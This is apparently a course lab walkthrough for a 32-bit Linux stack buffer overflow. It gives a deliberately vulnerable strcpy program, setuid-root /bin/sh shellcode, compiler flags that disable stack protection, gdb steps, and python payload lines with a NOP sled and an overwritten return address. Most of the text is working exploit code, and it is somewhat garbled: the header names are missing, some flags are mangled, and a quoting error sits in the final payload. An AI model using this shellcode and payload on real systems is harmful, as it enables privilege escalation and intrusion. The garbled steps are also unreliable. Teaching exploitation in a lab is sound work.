Develop a buffer overload exploit using a 32bit linux system.

1. Create a program with a stack based buffer.

#define _CRT_SECURE_NO_WARNINGS

#include

#include

#include

using namespace std;

int main(int argc, char* argsv[])

{

char buffer[500];

strcpy(buffer, argsv[1]);

printf("%s", buffer);

return 0;

}

b. Copy shellcode to overlay the return address in the stack

char shellcode[]=

 "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"

 "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

 "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

 "\x80\xe8\xdc\xff\xff\xff/bin/sh"; 

1. c. Pass control to your shellcode
2. d. Your shellcode should activate a shell /bin/sh on linux.

PROCESS:

1. gedit lab4.cpp
   1. include source from above.
2. gcc lab4.cpp g o lab4
   1. Compile and test
3. gdb lab4
   1. use debugger to load and examine code
4. list

5. quit
6. Recompile with options to allow execution in stack
   1. gcc -z execstack -fno-stack-protector -mpreferred-stack-boundary=2 -g lab4.cpp -o lab4
   2. chmod +x lab4
7. run $(python -c 'print "\x41" * 508')

8. x/120x ($esp-120)

9. run $(python -c 'print "\x90" * 426 + "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" + "\x51\x51\x51\x51" * 10')

10. select an address in the sled 0xbfffeeb8 (your address will lily be different)

run $(python -c 'print "\x90" * 427 + "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff + /bin/sh" + "\xb8\xee\xff\xbf" * 7')